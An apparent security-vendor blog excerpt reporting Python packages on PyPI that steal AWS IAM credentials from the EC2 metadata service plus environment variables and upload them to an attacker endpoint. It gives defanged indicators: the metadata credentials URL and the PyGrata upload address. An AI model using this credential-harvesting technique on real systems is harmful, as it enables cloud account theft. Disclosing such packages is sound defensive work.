Last week, Sonatype discovered multiple Python packages that not only exfiltrate your secrets — AWS credentials and environment variables but rather upload these to a publicly exposed endpoint.
These packages were discovered by Sonatype’s automated malware detection system, offered as a part of Nexus platform products, including Nexus Firewall. On a further review, we deemed these packages malicious and reported them to PyPI.
These malicious packages, assigned sonatype-2022-3475 and sonatype-2022-3546 are:
Analyzed by Sonatype security researchers Jorge Cardona and Carlos Fernándezsome of these packages either contain code that reads and exfiltrates your secrets or use one of the dependencies that will do the job.
For example, the ‘loglib-modules’ and ‘pygrata-utils’ packages contain malicious code, part of which is shown below.
Line 21 connects to a 169.254 IP address, which belongs to the link-local IP range and is used by Amazon EC2 instances to provide the EC2 Instance Metadata Service.
The URL ‘hxxp: //169.254.169[.]254 / latest / meta-data / iam / security-credentials / ‘is known to return IAM role information pertaining to an EC2 cloud instance.
Subsequent lines of code (Line 22-26) peek into AWS credentials, network interface information, and environment variables.
The script then attempts to upload the collected credentials, and metadata to one or more endpoints hosted on the PyGrata domain:
hxxp: //graph.pygrata[.]com: 8000 / upload
The usage of the PyGrata[.]com domain and the names of some of the malicious packages (pygrata-utils) weren’t imminently clear to us as to their purpose.
Interestingly though, our researchers noticed the endpoints collecting these credentials were exposing this data to just about anyone on the (Read more …)